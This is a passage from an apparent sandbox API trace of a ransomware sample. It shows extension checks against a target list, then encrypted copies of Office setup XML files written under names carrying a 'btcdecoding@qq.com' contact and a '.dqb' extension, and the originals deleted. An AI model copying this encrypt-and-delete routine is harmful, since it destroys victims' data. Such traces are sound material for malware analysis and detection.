Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.809] lstrlenW (lpString=".1cd") returned 4 [0039.809] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.809] lstrlenW (lpString=".jpg") returned 4 [0039.809] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.809] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.809] lstrlenW (lpString=".doc") returned 4 [0039.809] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString=".docx") returned 5 [0039.809] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0039.809] lstrlenW (lpString=".pdf") returned 4 [0039.809] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString=".xls") returned 4 [0039.809] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString=".xlsx") returned 5 [0039.809] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0039.809] lstrlenW (lpString=".ppt") returned 4 [0039.809] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.809] lstrlenW (lpString=".zip") returned 4 [0039.809] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.809] lstrlenW (lpString=".rar") returned 4 [0039.809] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString=".bz2") returned 4 [0039.809] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString=".7z") returned 3 [0039.809] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.809] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.809] lstrlenW (lpString=".dbf") returned 4 [0039.809] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.810] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.810] lstrlenW (lpString=".1cd") returned 4 [0039.810] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.810] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.810] lstrlenW (lpString=".jpg") returned 4 [0039.810] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.810] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.810] lstrlenW (lpString="SETUP.XML") returned 9 [0039.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.812] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1872) returned 1 [0039.812] CloseHandle (hObject=0x1a4) returned 1 [0039.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 0x20 [0039.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.813] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.813] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0039.813] GetLastError () returned 0x0 [0039.813] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x750, lpOverlapped=0x0) returned 1 [0039.814] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x760, lpOverlapped=0x0) returned 1 [0039.815] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.815] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.815] SetEndOfFile (hFile=0x200) returned 1 [0039.815] CloseHandle (hObject=0x200) returned 1 [0039.816] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.816] SetEndOfFile (hFile=0x1a4) returned 1 [0039.817] CloseHandle (hObject=0x1a4) returned 1 [0039.817] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.817] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 1 [0039.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.817] lstrlenW (lpString=".doc") returned 4 [0039.817] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.817] lstrlenW (lpString=".docx") returned 5 [0039.817] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.818] lstrlenW (lpString=".pdf") returned 4 [0039.818] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString=".xls") returned 4 [0039.818] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString=".xlsx") returned 5 [0039.818] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.818] lstrlenW (lpString=".ppt") returned 4 [0039.818] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.818] lstrlenW (lpString=".zip") returned 4 [0039.818] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.818] lstrlenW (lpString=".rar") returned 4 [0039.818] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString=".bz2") returned 4 [0039.818] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString=".7z") returned 3 [0039.818] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.818] lstrlenW (lpString=".dbf") returned 4 [0039.818] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.818] lstrlenW (lpString=".1cd") returned 4 [0039.818] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.818] lstrlenW (lpString=".jpg") returned 4 [0039.818] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.818] lstrlenW (lpString=".doc") returned 4 [0039.818] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.818] lstrlenW (lpString=".docx") returned 5 [0039.818] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.818] lstrlenW (lpString=".pdf") returned 4 [0039.818] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.819] lstrlenW (lpString=".xls") returned 4 [0039.819] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.819] lstrlenW (lpString=".xlsx") returned 5 [0039.819] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.819] lstrlenW (lpString=".ppt") returned 4 [0039.819] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.819] lstrlenW (lpString=".zip") returned 4 [0039.819] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.819] lstrlenW (lpString=".rar") returned 4 [0039.819] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.819] lstrlenW (lpString=".bz2") returned 4 [0039.819] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.819] lstrlenW (lpString=".7z") returned 3 [0039.819] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.819] lstrlenW (lpString=".dbf") returned 4 [0039.819] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.819] lstrlenW (lpString=".1cd") returned 4 [0039.819] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0039.819] lstrlenW (lpString=".jpg") returned 4 [0039.819] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.819] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.819] lstrlenW (lpString="Proof.XML") returned 9 [0039.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.820] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1347) returned 1 [0039.820] CloseHandle (hObject=0x1a4) returned 1 [0039.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 0x20 [0039.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.820] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.820] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0039.820] GetLastError () returned 0x0 [0039.820] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x543, lpOverlapped=0x0) returned 1 [0039.822] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x550, lpOverlapped=0x0) returned 1 [0039.823] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.823] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.823] SetEndOfFile (hFile=0x200) returned 1 [0039.823] CloseHandle (hObject=0x200) returned 1 [0039.824] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.824] SetEndOfFile (hFile=0x1a4) returned 1 [0039.824] CloseHandle (hObject=0x1a4) returned 1 [0039.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.825] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 1 [0039.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.825] lstrlenW (lpString=".doc") returned 4 [0039.825] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.825] lstrlenW (lpString=".docx") returned 5 [0039.825] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0039.825] lstrlenW (lpString=".pdf") returned 4 [0039.825] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.825] lstrlenW (lpString=".xls") returned 4 [0039.825] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.825] lstrlenW (lpString=".xlsx") returned 5 [0039.825] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0039.825] lstrlenW (lpString=".ppt") returned 4 [0039.825] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.825] lstrlenW (lpString=".zip") returned 4 [0039.825] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.825] lstrlenW (lpString=".rar") returned 4 [0039.825] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.825] lstrlenW (lpString=".bz2") returned 4 [0039.825] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.825] lstrlenW (lpString=".7z") returned 3 [0039.825] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.825] lstrlenW (lpString=".dbf") returned 4 [0039.825] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.826] lstrlenW (lpString=".1cd") returned 4 [0039.826] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.826] lstrlenW (lpString=".jpg") returned 4 [0039.826] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.826] lstrlenW (lpString=".doc") returned 4 [0039.826] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString=".docx") returned 5 [0039.826] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0039.826] lstrlenW (lpString=".pdf") returned 4 [0039.826] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString=".xls") returned 4 [0039.826] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString=".xlsx") returned 5 [0039.826] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0039.826] lstrlenW (lpString=".ppt") returned 4 [0039.826] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.826] lstrlenW (lpString=".zip") returned 4 [0039.826] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.826] lstrlenW (lpString=".rar") returned 4 [0039.826] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString=".bz2") returned 4 [0039.826] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString=".7z") returned 3 [0039.826] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.826] lstrlenW (lpString=".dbf") returned 4 [0039.826] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.826] lstrlenW (lpString=".1cd") returned 4 [0039.827] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.827] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0039.827] lstrlenW (lpString=".jpg") returned 4 [0039.827] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.827] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.827] lstrlenW (lpString="Proof.XML") returned 9 [0039.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.828] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1457) returned 1 [0039.828] CloseHandle (hObject=0x1a4) returned 1 [0039.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 0x20 [0039.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.830] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.830] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.830] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.830] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0039.831] GetLastError () returned 0x0 [0039.831] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x5b1, lpOverlapped=0x0) returned 1 [0039.832] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0039.833] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.833] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.833] SetEndOfFile (hFile=0x200) returned 1 [0039.833] CloseHandle (hObject=0x200) returned 1 [0039.834] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.834] SetEndOfFile (hFile=0x1a4) returned 1 [0039.835] CloseHandle (hObject=0x1a4) returned 1 [0039.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.835] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 1 [0039.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.835] lstrlenW (lpString=".doc") returned 4 [0039.835] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.835] lstrlenW (lpString=".docx") returned 5 [0039.835] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0039.835] lstrlenW (lpString=".pdf") returned 4 [0039.835] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.835] lstrlenW (lpString=".xls") returned 4 [0039.835] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.835] lstrlenW (lpString=".xlsx") returned 5 [0039.835] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0039.835] lstrlenW (lpString=".ppt") returned 4 [0039.836] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 